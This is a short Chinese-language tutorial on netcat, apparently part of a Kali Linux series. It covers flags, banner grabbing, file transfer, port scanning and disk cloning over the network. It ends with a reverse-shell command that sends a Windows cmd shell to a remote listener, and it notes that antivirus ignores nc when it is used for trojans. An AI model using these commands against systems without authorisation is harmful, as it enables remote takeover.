網絡工具中的瑞士軍刀----體積小，功能強大

偵聽模式/傳輸模式

telnet/獲取banner信息

傳輸文本信息，文件，目錄

加密傳輸文件，遠程控制/木馬，加密所有流量（來做遠程控制是非常理想的選擇，因為殺軟不會把nc當成病毒殺掉）

可用作流媒體服務，

遠程克隆硬盤，遠程電子取證信息收集等

常用參數

-v 顯示詳細輸出內容

-n 不進行dns解析

-l 監聽模式

-p 監聽端口號

-z 探測相應的端口有沒有開放

-u 探測udp的端口開放情況

-q 任務完成退出

實例：

連接123.125.50.29的pop3端口，並且獲取了banner信息

nc -lp監聽本機的4444端口並把內容寫到xxsec.txt中，客戶端連接服務端的4444端口，進行遠程操作，用作電子取證的時候可以盡量不破壞證據

服務端把接受到的文件重定向到x.txt文件，客戶端把xxsec.txt文件傳輸到目標

也可以服務端準備好發送的文件，建立監聽，客戶端自定義文件名字連接，即把文件下載到客戶端

先用tar命令打包一個文件夾，不用指定名字，然後nc監聽本機 -q 1 是數據傳輸完成後1秒退出，接著客戶端nc連接目標，並用tar命令解包， （細節不要忘了 - ）

服務端cat一個視頻 管道到nc，客戶端連接到服務端，並使用視頻播放器播放（mplayer播放器要自行安裝）

可用來掃描端口，後面必須指定端口範圍

用來克隆硬盤，也可以復制內存，演示就不做了，耗費時間

A：nc -lp 3333 | dd of=/dev/sdb

B：dd if=/dev/sda | nc -nv 192.168.1.10 3333 -q 1

B是被克隆的硬盤，A是要克隆B的硬盤

用來遠程控制

正向：

反向：

windows服務端：nc -lp 6666

客戶端：nc 192.198.1.11 6666 -c cmd

kali linux之netcat